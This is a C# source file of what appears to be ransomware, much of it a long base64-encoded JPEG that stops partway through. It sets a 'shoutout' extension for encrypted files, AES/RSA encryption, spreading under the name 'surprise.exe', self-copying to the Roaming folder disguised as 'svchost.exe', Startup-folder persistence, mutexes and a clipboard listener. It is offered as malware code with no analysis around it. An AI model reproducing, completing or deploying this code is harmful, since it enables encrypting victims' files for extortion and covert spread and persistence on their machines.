using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
using Microsoft.Win32;

namespace ConsoleApplication7;

internal class Program
{
	public static class NativeMethods
	{
		public const int clp = 797;

		public static IntPtr intpreclp = new IntPtr(-3);

		[DllImport("user32.dll", SetLastError = true)]
		[return: MarshalAs(UnmanagedType.Bool)]
		public static extern bool AddClipboardFormatListener(IntPtr hwnd);

		[DllImport("user32.dll", SetLastError = true)]
		public static extern IntPtr SetParent(IntPtr hWndChild, IntPtr hWndNewParent);
	}

	private static string userName = Environment.UserName;

	private static string userDir = "C:\\Users\\";

	public static string appMutexRun = "7z459ajrk722yn8c5j4fg";

	public static bool encryptionAesRsa = true;

	public static string encryptedFileExtension = "shoutout";

	private static bool checkSpread = true;

	private static string spreadName = "surprise.exe";

	private static bool checkCopyRoaming = true;

	private static string processName = "svchost.exe";

	public static string appMutexRun2 = "2X28tfRmWaPyPQgvoHV";

	private static bool checkStartupFolder = true;

	private static bool checkSleep = false;

	private static int sleepTextbox = 10;

	private static string base64Image = "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